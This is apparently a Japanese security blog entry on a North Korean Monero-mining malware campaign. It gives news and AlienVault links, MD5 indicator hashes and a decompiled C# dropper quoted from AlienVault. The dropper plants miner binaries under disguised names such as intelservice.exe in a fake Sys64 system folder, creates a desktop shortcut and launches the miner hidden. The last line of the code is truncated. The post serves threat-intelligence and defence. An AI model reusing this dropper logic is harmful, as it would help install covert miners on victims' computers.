【ニュース】
◆北朝鮮ハッカーの新手口、「モネロ採掘」標的に (WSJ, 2018/01/09 06:30)
http://jp.wsj.com/articles/SB11634795812220464149304583626240703581184
【公開情報】
◆A North Korean Monero Cryptocurrency Miner (Alien Vault, 2018/01/08)
https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner
【関連まとめ記事】
◆暗号資産 / 仮想通貨 (まとめ)
https://security-log.hatenablog.com/entry/Cryptographic_Assets
【インディケータ情報】
■ハッシュ情報(MD5)
6a261443299788af1467142d5f538b2c
762c3249904a8bf76802effb54426655
42344bb45f351757e8638656e12a0135
(以上は Alien Vault の情報。 引用元は https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner)
■デコンパイル情報(6a261443299788af1467142d5f538b2c)
using System; using System.Diagnostics; using System.IO; using System.Runtime.CompilerServices; using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; namespace ConsoleApp5 { // Token: 0x02000008 RID: 8 [StandardModule] internal sealed class Module1 { // Token: 0x0600000F RID: 15 RVA: 0x00002128 File Offset: 0x00000328 [STAThread] public static void Main() { Console.WriteLine("Aucun argument"); char array = "ABDCEFGHIJKLNMOPQRSTVUWXYZ".ToCharArray(); char array2 = "0123456789".ToCharArray(); Random random = new Random(); string text = string.Empty; while (text.Length < 6) { if (random.Next(0, 2) == 0) { text += Conversions.ToString(array[random.Next(0, array.Length)]); } else { text += Conversions.ToString(array2[random.Next(0, array2.Length)]); } } Console.WriteLine(text); if (!Directory.Exists("C:\\Windows\\Sys64")) { Directory.CreateDirectory("C:\\Windows\\Sys64"); } if (!Directory.Exists("C:\\SoftwaresInstall")) { Directory.CreateDirectory("C:\\SoftwaresInstall"); } if (!File.Exists("C:\\Windows\\Sys64\\updater.exe")) { File.Copy("licence/key.dat", "C:\\Windows\\Sys64\\updater.exe"); } if (!File.Exists("C:\\Windows\\Sys64\\intelservice.exe")) { File.Copy("licence\\licence.dat", "C:\\Windows\\Sys64\\intelservice.exe"); } File.Copy("setup\\update.exe", "C:\\SoftwaresInstall\\soft" + text + ".exe"); object objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell", "")); objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell", "")); object objectValue2 = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, "SpecialFolders", new object { "Desktop" }, null, null, null)); object objectValue3 = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, "CreateShortcut", new object { Operators.ConcatenateObject(objectValue2, "\\shortcut.lnk") }, null, null, null)); NewLateBinding.LateSet(objectValue3, null, "TargetPath", new object { NewLateBinding.LateGet(objectValue, null, "ExpandEnvironmentStrings", new object { "C:\\Windows\\Sys64\\updater.exe" }, null, null, null) }, null, null); NewLateBinding.LateSet(objectValue3, null, "WorkingDirectory", new object { NewLateBinding.LateGet(objectValue, null, "ExpandEnvironmentStrings", new object { "C:\\Windows\\Sys64" }, null, null, null) }, null, null); NewLateBinding.LateSet(objectValue3, null, "WindowStyle", new object[] { 4 }, null, null); NewLateBinding.LateCall(objectValue3, null, "Save", new object[0], null, null, null, true); Process.Start("C:\\SoftwaresInstall\\soft" + text + ".exe", ""); Console.WriteLine("The number of processors on this computer is {0}.", Environment.ProcessorCount); int processorCount = Environment.ProcessorCount; Console.WriteLine(processorCount); int value = checked(processorCount - 1); string str = "KJU" + Conversions.ToString(processorCount); Process.Start(new ProcessStartInfo("C:\\Windows\\Sys64\\intelservice.exe") { WindowStyle = ProcessWindowStyle.Hidden, Arguments = *1 ?? "") }); } } }
(以上は Alien Vault の情報。 引用元は https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner)